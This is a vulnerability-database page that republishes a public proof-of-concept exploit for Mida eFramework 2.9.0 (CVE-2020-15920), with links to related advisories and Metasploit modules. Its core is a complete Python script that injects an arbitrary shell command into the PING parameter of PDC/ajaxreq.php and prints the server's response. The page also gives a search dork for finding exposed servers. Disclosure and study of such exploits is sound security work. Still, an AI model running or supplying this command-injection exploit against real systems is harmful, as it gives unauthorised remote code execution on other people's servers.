Lucene search

K

Mida eFramework 2.9.0 Remote Code Execution

🗓️ 27 Aug 2020 00:00:00Reported by elbaeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 476 Views

Mida eFramework 2.9.0 Remote Code Execution CVE-2020-1592

Show more
Related
Code
ReporterTitlePublishedViews
Family
Metasploit
Mida Solutions eFramework ajaxreq.php Command Injection
30 Aug 202012:46
metasploit
Exploit DB
Mida eFramework 2.9.0 - Remote Code Execution
27 Aug 202000:00
exploitdb
0day.today
Mida Solutions eFramework ajaxreq.php Command Injection Exploit
16 Sep 202000:00
zdt
Prion
Command injection
24 Jul 202001:15
prion
NVD
CVE-2020-15920
24 Jul 202001:15
nvd
Nuclei
Mida eFramework <=2.9.0 - Remote Command Execution
1 Sep 202018:38
nuclei
Cvelist
CVE-2020-15920
24 Jul 202000:58
cvelist
Packet Storm
Mida Solutions eFramework ajaxreq.php Command Injection
16 Sep 202000:00
packetstorm
CVE
CVE-2020-15920
24 Jul 202001:15
cve
Rapid7 Blog
Metasploit Wrap-Up
18 Sep 202018:28
rapid7blog
Rows per page
`# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution  
# Google Dork: Server: Mida eFramework  
# Date: 2020-08-27  
# Exploit Author: elbae  
# Vendor Homepage: https://www.midasolutions.com/  
# Software Link: http://ova-efw.midasolutions.com/  
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html  
# Version: <= 2.9.0  
# CVE : CVE-2020-15920  
  
  
#! /usr/bin/python3  
# -*- coding: utf-8 -*-  
  
import argparse  
import requests  
import subprocess  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
  
def print_disclaimer():  
print("""  
---------------------  
Disclaimer:  
1) For testing purpose only.  
2) Do not attack production environments.  
3) Intended for educational purposes only and cannot be used for law  
violation or personal gain.  
4) The author is not responsible for any possible harm caused by this  
material.  
---------------------""")  
  
  
def print_info():  
print("""  
[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)  
[*] Reference:  
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html  
[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability  
(RCE) in PDC/ajaxreq.php  
Version\t< 2.9.0\t./CVE-2020-15920  
http://192.168.1.60:8090/PDC/ajaxreq.php id  
Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php  
id """)  
  
def pwn(url,cmd):  
running = """  
[*] Target URL: {0}  
[*] Command: {1}  
"""  
print(running.format(url,cmd))  
data = {  
"DIAGNOSIS":"PING",  
"PARAM":"127.0.0.1 -c 0; {0}".format(cmd)  
}  
r = requests.post(url,data=data,verify=False)  
line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"  
pretty_output = r.text.replace('<br>','\n')  
print(line+"\n{0}\n".format(pretty_output)+line)  
  
def main():  
print_info()  
print_disclaimer()  
parser = argparse.ArgumentParser()  
parser.add_argument("target", type=str, help="the complete target URL")  
parser.add_argument("cmd", type=str, help="the command you want to run")  
args = parser.parse_args()  
pwn(args.target, args.cmd)  
  
if __name__ == '__main__':  
main()  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo